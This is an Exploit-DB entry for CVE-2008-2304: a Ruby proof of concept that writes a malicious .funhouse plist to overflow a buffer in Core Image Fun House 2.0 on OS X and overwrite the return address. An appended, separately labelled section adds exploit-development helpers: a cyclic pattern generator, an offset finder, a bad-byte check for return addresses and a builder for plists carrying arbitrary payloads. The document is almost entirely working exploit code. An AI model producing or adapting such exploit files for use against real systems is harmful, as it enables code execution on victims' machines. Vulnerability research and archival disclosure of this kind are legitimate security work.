Core Image Fun House <= 2.0 - Arbitrary Code Execution PoC OSX

2008-07-11T00:00:00
ID EDB-ID:6043
Type exploitdb
Reporter Adriel T. Desautels
Modified 2008-07-11T00:00:00

Description

Core Image Fun House <= 2.0 Arbitrary Code Execution PoC (OSX). CVE-2008-2304. DoS exploit for the OSX platform

#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@netragard.com
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7:      'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
#        CFPropertyListCreateFromXMLData(): plist parse failed;
#        the data is not proper UTF-8. The file name for this data
#        could be:
#        /Users/test/Desktop/SuperTastey.funhouse/file.xml
#        The parser will retry as in 10.2, but the problem should be
#        corrected in the plist.
#
# I.e. bytes in the \x80-\xFF range that do not form proper UTF-8 trip
# the check above and send the parser down the retry path.

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d  # There are lots of filtered chars!

if File.exist?(fname + ".funhouse/file.xml")
    File.unlink(fname + ".funhouse/file.xml")
    Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"

File.open(fname + ".funhouse/file.xml", "w+") { |f|
  f.print(FUNSTUFF)  # weeeeee... lets have fun.
}
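Added example, not part of the Netragard PoC above: two helpers a tester would use alongside it. The gdb line in the PoC header shows the author located the saved return address by placing a marker dword after the 'Z' padding ("DCBA" is what 0x41424344 packed little-endian yields); a non-repeating cyclic pattern does the same job in one crash. The second helper checks whether a candidate return address survives the byte filters the "lots of filtered chars" comment alludes to. Those filter rules are assumptions drawn from the page, not something the PoC states outright: the CFLog message says bytes that are not proper UTF-8 make CFPropertyListCreateFromXMLData fall back to the 10.2 parser, and a raw NUL, '<' or '&' cannot appear inside an XML <string> element, so the check rejects NUL, '<', '&' and, conservatively, every byte >= 0x80. The plist builder reproduces only the image layer of the PoC; the CIGlassDistortion filter layer is left out.

```ruby
#!/usr/bin/ruby
# Added example; not part of the Netragard PoC. Assumptions are marked.

ALPHA = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a

# Non-repeating marker pattern (same construction as pattern_create):
# every 4-byte window is unique within the first 20280 bytes, so the
# dword that lands in EIP maps back to exactly one offset.
def cyclic_pattern(length)
  out = String.new
  ALPHA.each do |a|
    LOWER.each do |b|
      DIGIT.each do |c|
        out << a << b << c
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Offset of the dword found in EIP (little-endian, as gdb prints $eip)
# into the pattern, or nil if it is not part of the pattern.
def pattern_offset(eip_value, length = 20280)
  cyclic_pattern(length).index([eip_value].pack("V"))
end

# ASSUMED filter for bytes a UTF-8 XML <string> cannot carry raw:
# NUL, '<' and '&' break the XML, and (per the CFLog message quoted
# in the PoC) bytes >= 0x80 must form valid UTF-8, which a 4-byte
# address rarely does, so they are rejected wholesale.
def bad_byte?(b)
  b == 0x00 || b == 0x3c || b == 0x26 || b >= 0x80
end

# True when every byte of the little-endian packed address passes.
def address_usable?(addr)
  [addr].pack("V").bytes.none? { |b| bad_byte?(b) }
end

# Same single-image-layer plist as the PoC, with an arbitrary payload
# in the layer's <file> string (the filter layer is omitted).
def funhouse_plist(file_payload)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
      <key>layers</key>
      <array>
        <dict>
          <key>file</key>
          <string>#{file_payload}</string>
          <key>offsetX</key>
          <real>0.0</real>
          <key>offsetY</key>
          <real>0.0</real>
          <key>type</key>
          <string>image</string>
        </dict>
      </array>
    </dict>
    </plist>
  XML
end

# Usage: ruby this.rb Pattern.funhouse  writes a pattern bundle; open it
# under gdb, then feed the dword from $eip back into pattern_offset.
if __FILE__ == $0
  if ARGV[0]
    Dir.mkdir(ARGV[0]) unless Dir.exist?(ARGV[0])
    File.write("#{ARGV[0]}/file.xml", funhouse_plist(cyclic_pattern(300)))
  end
  # Hypothetical crash: gdb reported $eip = 0x41326141 ("Aa2A" in memory)
  puts "offset: #{pattern_offset(0x41326141)}"              # 6
  puts "0x0d0d0d0d usable? #{address_usable?(0x0d0d0d0d)}"  # true
  puts "0xbfffddf7 usable? #{address_usable?(0xbfffddf7)}"  # false
end
```

The PoC's own choice of 0x0d0d0d0d passes the filter (four carriage returns are legal XML text), while a stack address such as the 0xbfffddf7 shown in the gdb dump does not, because every byte is above 0x7f; that is the constraint behind the "lots of filtered chars" remark.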

# milw0rm.com [2008-07-11]